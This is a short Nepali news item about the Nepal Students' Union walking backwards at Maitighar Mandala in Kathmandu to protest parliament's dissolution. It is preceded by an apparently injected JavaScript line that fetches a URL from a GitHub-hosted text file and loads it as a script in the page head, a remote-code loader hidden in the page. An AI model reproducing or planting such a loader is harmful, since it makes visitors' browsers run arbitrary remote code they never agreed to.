;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
पुष २४,
काठमाडौं । नेपाल विद्यार्थी संघ केन्द्रीय समितिले उल्टो हिडेर संसद् बिघटको बिरोध गरेको छ ।
शुक्रबार राजधानीको माईतिघर मण्डलामा उल्टो हिडरे बिरोध प्रर्दशन गरेको हो । नेविसंघले चरणबद्ध आन्दोलनका कार्यक्रमहरु गरिरहेको छ ।
त्यस्तै नेबिसंघले शनिबार ३३० प्रर्दश सभाहरुमा एकैसाथ प्रर्दशन गर्ने जनाएको छ ।
तस्बिर हेर्नुहोस्
फेसबुक प्रतिक्रियाहरु